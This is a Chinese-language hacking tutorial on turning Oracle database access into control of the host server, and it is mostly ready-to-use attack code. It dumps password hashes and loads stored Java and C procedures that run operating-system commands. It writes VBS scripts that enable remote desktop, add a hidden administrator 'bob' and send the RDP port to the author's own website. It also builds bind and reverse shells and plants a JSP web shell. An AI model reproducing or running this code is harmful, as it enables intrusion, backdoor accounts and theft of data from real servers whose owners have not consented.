作者:Robert
配合open那个工具
第一部分
基本查询指令
select * from V$PWFILE_USERS //查看dba用户
select * from v$version //查看oracle版本以及系统版本
select * from session_privs;// 查看当前用户拥有的权限值
select * from user_role_privs\\查询当前用户角色
select * from user_sys_privs\\查询当前用户系统权限
select username,password from dba_users; //查看所有用户密码hash
select * from dba_sys_privs where grantee=’SYSTEM’;\\查系统权限
grant select any dictionary to system with admin option;\\登陆不上OEM时候需要此权限
Select name,password FROM user$ Where name=’SCOTT’; //低版本查看单用户密码
Select username,decode(password,NULL,’NULL’,password) password FROM dba_users; //查看用户hash
create user bob identified by iloveyou;\\建用户bob密码iloveyou
grant dba to bob;\\赋予bob DBA权限
grant execute on xmldom to bob \\赋予用户execute
Create ROLE “javauserpriv” NOT IDENTIFIED
Create ROLE “javasyspriv” NOT IDENTIFIED \\当提示role ‘JAVASYSPRIV’ does not exist使用
select grantee from dba_role_privs where granted_role=’DBA’; \\检查那些用户有DBA权限
select * from dba_directories;\\查看路径所在目录
第二部分,创建java,执行系统命令
no.1
Create or REPLACE LIBRARY exec_shell AS 'c:\windows\system32\msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors |
上面这个没有回显的
如果不行可以使用下面这个
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME\msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors |
执行完后
执行
exec oracmd.exec (‘net1 user robert iloveyou /add’);
no.2
Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS import java.io.*; public class Host { public static void executeCommand(String command) { try { String[] finalCommand; if (isWindows()) { finalCommand = new String[4]; // Use the appropriate path for your windows version. finalCommand[0] = "C:\\windows\\system32\\cmd.exe"; // Windows XP/2003 //finalCommand[0] = "C:\\winnt\\system32\\cmd.exe"; // Windows NT/2000 finalCommand[1] = "/y"; finalCommand[2] = "/c"; finalCommand[3] = command; } else { finalCommand = new String[3]; finalCommand[0] = "/bin/sh"; finalCommand[1] = "-c"; finalCommand[2] = command; } final Process pr = Runtime.getRuntime().exec(finalCommand); pr.waitFor(); new Thread(new Runnable(){ public void run() { BufferedReader br_in = null; try { br_in = new BufferedReader(new InputStreamReader(pr.getInputStream())); String buff = null; while ((buff = br_in.readLine()) != null) { System.out.println("Process out :" + buff); try {Thread.sleep(100); } catch(Exception e) {} } br_in.close(); } catch (IOException ioe) { System.out.println("Exception caught printing process output."); ioe.printStackTrace(); } finally { try { br_in.close(); } catch (Exception ex) {} } } }).start(); new Thread(new Runnable(){ public void run() { BufferedReader br_err = null; try { br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream())); String buff = null; while ((buff = br_err.readLine()) != null) { System.out.println("Process err :" + buff); try {Thread.sleep(100); } catch(Exception e) {} } br_err.close(); } catch (IOException ioe) { System.out.println("Exception caught printing process error."); ioe.printStackTrace(); } finally { try { br_err.close(); } catch (Exception ex) {} } } }).start(); } catch (Exception ex) { System.out.println(ex.getLocalizedMessage()); } } public static boolean isWindows() { if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) return true; else return false; } }; / Create or REPLACE PROCEDURE host_command 
(p_command IN VARCHAR2) AS LANGUAGE JAVA NAME 'Host.executeCommand (java.lang.String)'; / EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete'); EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); / DECLARE l_output DBMS_OUTPUT.chararr; l_lines INTEGER := 1000; BEGIN DBMS_OUTPUT.enable(1000000); DBMS_JAVA.set_output(1000000); host_command('dir C:\'); DBMS_OUTPUT.get_lines(l_output, l_lines); END; |
这个要注意两点
win下注意系统路径
linux下注意注释掉win
最后一句就是执行命令的
host_command(‘dir C:\’);
no.3
create or replace and compile java souRCe named "util" as import java.io.*; import java.lang.*; public class util extends Object { public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(); int RC = -1; try { Process p = rt.exec(args); int bufSize = 4096; BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize); int len; byte buffer[] = new byte[bufSize]; // Echo back what the program spit out while ((len = bis.read(buffer, 0, bufSize)) != -1) System.out.write(buffer, 0, len); RC = p.waitFor(); } catch (Exception e) { e.printStackTrace(); RC = -1; } finally { return RC; } } } / create or replace function RUN_CMz(p_cmd in varchar2) return number as language java name 'util.RunThis(java.lang.String) return integer'; / create or replace procedure RC(p_cmd in varChar) as x number; begin x := RUN_CMz(p_cmd); end; / variable x number; set serveroutput on; exec dbms_java.set_output(100000); grant javasyspriv to system; |
这句注意最后这里要授权下当前登陆的用户
grant javasyspriv to system
最后执行
exec
:=run_cmz(‘ipconfig’);
第二部分 操作磁盘文件
no.1
建立目录
create or replace directory DIR as ‘C:\’;
此目录当然也可以是启动目录
授权
grant read, write on directory DIR to system
这步可以不用
然后执行操作
写文件 3129_code.txt
# 鬼仔注:写文件的这段代码被nod32误报,好多人以为是被挂马了,无奈只好写进txt了
这步操作讲下载我的木马到c盘并执行
declare file utl_file.file_type; begin file := utl_file.fopen('DIR', '3389.vbs', 'W'); utl_file.put_line(file, 'Dim OperationRegistry Set OperationRegistry=WScript.createObject("WScript.Shell") Dim TSPort,TSState,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" TSPort=OperationRegistry.RegRead(TSRegPath) TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" TSState=OperationRegistry.RegRead(TSRegPath) If TSState=0 Then Else OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD" End If'); utl_file.fflush(file); utl_file.fclose(file); end; / exec :x:=run_cmz('cscript c:\3389.vbs'); |
vbs开启3389
declare file utl_file.file_type; begin file := utl_file.fopen('DIR', 'user.vbs', 'W'); utl_file.put_line(file, 'set wsnetwork=CreateObject("WSCRIPT.NETWORK") os="WinNT://"'||'&'||'wsnetwork.ComputerName Set oa=CreateObject("Scripting.FileSystemObject") Set ob=GetObject(os) Set oe=GetObject(os&"/Administrators,group") Set od=ob.Create("user","bob") od.SetPassword "123456abc!@#" od.SetInfo Set of=GetObject(os&"/bob",user) oe.add os&"/bob" oa.DeleteFile("user.vbs")'); utl_file.fflush(file); utl_file.fclose(file); end; / / exec :x:=run_cmz('cscript c:\user.vbs'); |
无net添加admin用户
declare file utl_file.file_type; begin file := utl_file.fopen('DIR', '3389p.vbs', 'W'); utl_file.put_line(file, ' Dim OperationRegistry Set OperationRegistry=WScript.createObject("WScript.Shell") Dim TSPort,TSState,TSRegPath TSRegPath="HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp\PortNumber" TSPort=OperationRegistry.RegRead(TSRegPath) Set xPost=CreateObject("Microsoft.XMLHTTP") xPost.Open "GET","http://blog.cnmoker.org/read3389/ro.asp?port=" '||'ccccc'||' TSPort,0 xPost.Send() TSRegPath="HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections" TSState=OperationRegistry.RegRead(TSRegPath) If TSState=0 Then Else OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD" End If set obj=wscript.createObject("wscript.shell") obj.Run("sc config TermService start= demand") obj.Run("sc stop TermService") obj.Run("sc start TermService") wscript.quit '); utl_file.fflush(file); utl_file.fclose(file); end; / exec :x:=run_cmz('cscript c:\3389p.vbs'); / exec :x:=run_cmz('del c:\3389p.vbs'); / http://blog.cnmoker.org/read3389/read.asp |
这个代码的作用是用来读取对方的3389端口并post下自己的网站数据库里
这个read.asp和ro.asp自己写吧
到此win下操作基本上是完成了
第三部分 linux的一些操作
linux的操作要用到sqlj语言
其实ISTO的kj总早就写了一些
我总结
create or replace and compile java source named bob as import java.io.*; import java.net.*; public class BOB{ public static String listFolder(String path){ File f=null; String str=""; f=new File(path); String[] files=f.list(); if(files!=null) for(int i=0;i<files .length;i++){ str+=files[i]+"\r\n"; } return str; } public static String saveFile(String filepath,String value){ FileOutputStream fos=null; try { fos=new FileOutputStream(filepath); fos.write(value.getBytes()); return "OK"; } catch (Exception e) { return e.getMessage(); } finally{ if(fos!=null){ try {fos.close();} catch (Exception e) {} } } } public static String readFile(String pathfile,String code){ BufferedReader br=null; String value=""; try { br=new BufferedReader(new InputStreamReader(new FileInputStream(pathfile),code)); String s=null; while((s=br.readLine())!=null){ value+=s; } return value; } catch (Exception e) { return e.getMessage(); } finally{ if(br!=null){try {br.close();} catch (IOException e) {}} } } public static String execFile(String filepath,String code){ int i=0; Runtime rt=Runtime.getRuntime(); String output=""; InputStreamReader isr = null; char[] bufferC=new char[1024]; try{ Process ps=rt.exec(filepath); isr=new InputStreamReader(ps.getInputStream(),code); while((i=isr.read(bufferC,0,bufferC.length))!=-1){ output+=new String(bufferC,0,i); } return output; }catch(Exception e){ return e.getMessage(); }finally{ if(isr!=null)try {isr.close();} catch (IOException e) {} } } public static String bindShell(int port){ ServerSocket ss=null; Socket s=null; try { ss = new ServerSocket(port); s=ss.accept(); new optShell(ss,s).start(); return "OK"; } catch (Exception e) { return e.getMessage(); } } public static String reverseShell(String host,int port){ Socket s=null; try{ s=new Socket(host,port); new optShell(null,s).start(); return "OK"; }catch(Exception e){ return e.getMessage(); } } //反弹shell的sqlj语句 public static class optShell extends Thread{ OutputStream os=null; InputStream is=null; 
ServerSocket ss; Socket s; public optShell(ServerSocket ss,Socket s){ this.ss=ss; this.s=s; try{ this.is=s.getInputStream(); this.os=s.getOutputStream(); }catch(Exception e){ if(os!=null)try {os.close();} catch(Exception ex) {} if(is!=null)try {is.close();} catch(Exception ex) {} if(s!=null)try {s.close();} catch(Exception ex) {} if(ss!=null)try {ss.close();} catch(Exception ex) {} } } public void run(){ BufferedReader br=new BufferedReader(new InputStreamReader(is)); String line=""; String cmdhelp="Command:\r\nlist \r\nsave\r\nread\r\nexec\r\nexit\r\n"; try { //os.write(cmdhelp.getBytes()); line=br.readLine(); while(!"exit".equals(line)){ if(line.length()>3){ StringBuffer sb=new StringBuffer(line.trim()); String cmd=sb.substring(0, 4); if(cmd.equals("list")){ os.write("input you path:\r\n".getBytes()); line=br.readLine(); os.write(listFolder(line).getBytes()); }else if("save".equals(cmd)){ os.write("input you filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you value:\r\n".getBytes()); os.write(saveFile(line,br.readLine()).getBytes()); }else if("read".equals(cmd)){ os.write("input you filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you code examle:GBK\r\n".getBytes()); os.write(readFile(line,br.readLine()).getBytes()); }else if("exec".equals(cmd)){ os.write("input you run filepath:\r\n".getBytes()); line=br.readLine(); os.write("input you code examle:GBK\r\n".getBytes()); os.write(execFile(line,br.readLine()).getBytes()); }else{ os.write(cmdhelp.getBytes()); } }else{ os.write(cmdhelp.getBytes()); } line=br.readLine(); } } catch (Exception e) { e.printStackTrace(); }finally{ if(os!=null)try {os.close();} catch(Exception e) {} if(is!=null)try {is.close();} catch(Exception e) {} if(s!=null)try {s.close();} catch(Exception e) {} if(ss!=null)try {ss.close();} catch(Exception e) {} } } } } / create or replace function BOB_LISTFOLDER(str varchar2) return varchar2 as language java name 'BOB.listFolder(java.lang.String) return 
java.lang.String'; / create or replace function BOB_SAVEFILE(p varchar2,v varchar2) return varchar2 as language java name 'BOB.saveFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_READFILE(p varchar2,c varchar2) return varchar2 as language java name 'BOB.readFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_EXECFILE(fp varchar2,c varchar2) return varchar2 as language java name 'BOB.execFile(java.lang.String,java.lang.String) return java.lang.String'; / create or replace function BOB_BINDSHELL(port number) return varchar2 as language java name 'BOB.bindShell(int) return java.lang.String'; / begin Dbms_Java.Grant_Permission('scott','java.io.FilePermission','< <ALL FILES>>','read,write,execute,delete'); Dbms_Java.Grant_Permission('scott','java.lang.RuntimePermission','*','writeFileDescriptor'); Dbms_Java.grant_permission('scott','java.net.SocketPermission','*:*','accept,connect,listen,resolve'); end; </files> |
这么一大段,仔细看
执行完后
Select BOB_LISTFOLDER('/usr') FROM DUAL //列目录 Select BOB_EXECFILE('C:\WINDOWS\system32\cmd.exe /c dir c:\','GBK') FROM DUAL; //执行命令 Select BOB_READFILE('/tmp/1.txt','GBK') FROM DUAL; //读文件 Select BOB_SAVEFILE('/tmp/1.jsp','< %if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>') FROM DUAL; 写jsp一句话 可查看我的上一篇BLOG Select BOB_BINDSHELL(20000) FROM DUAL //开启端口2000然后你telnet ip 2000上去 |
其中本来还有reverse shell的
我还没来的及测试
我自己是更中意反弹shell的
特别是linux
好操作的多
再说有时候linux是nat出来的
反弹就去了许多麻烦
第四部分 技巧
一句话读取3389端口
exec :x:=run_cmz('REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber'); |
一句话开3389 只合适win 2k3
exec :x:=run_cmz('REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f'); |
删除pcanywhere导致的终端登陆错误
exec :x:=run_cmz('reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f'); |
感谢kj,和linx的文章.
最后说下,关于web injection部分

